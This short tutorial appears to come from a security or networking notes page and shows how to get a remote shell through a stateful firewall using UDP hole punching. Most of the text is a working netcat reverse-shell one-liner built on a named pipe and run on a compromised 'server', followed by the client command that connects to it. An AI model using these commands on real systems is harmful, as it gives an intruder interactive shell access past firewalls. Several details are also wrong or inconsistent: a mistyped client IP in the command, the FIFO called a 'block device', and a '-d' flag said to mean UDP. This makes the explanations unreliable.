The following example demonstrates how to punch a hole through a stateful firewall using UDP. It opens a reverse shell on the server.
- Server: The target machine on which the shell will be opened.
- Client: The machine used to remotely connect to the shell.
- Server IP:
192.0.2.10 - Client IP:
198.51.100.15
- Remote code execution must be possible on the server
- Both machines must have
netcatinstalled.sudo apt install netcat - Use the following command for troubleshooting network issues:
sudo tcpdump -i any -n -l host 192.0.2.10 and udp and port 12345 -X
nc -uvp 12345 98.51.100.15 5555 || rm /tmp/bp 2>/dev/null; mknod /tmp/bp p; /bin/sh 0</tmp/bp | nc -l -uvp 12345 1>/tmp/bp
This command:
- initiates a connection to the client to create a new entry for the 5-tuple in the connection table:
nc -uvp 12345 98.51.100.15 5555 - creates a block device to create a communication channel between the sheel and the UDP tunnel:
mknod ... - creates a UDP listener that waits for a client connection:
nc -ulvnp 12345-l: listen for incoming connections-n: do not perform domain name resolution-p 12345: source/listen port-d: use UDP-v: verbose
Connect to the server
nc -uvp 5555 192.0.2.10 12345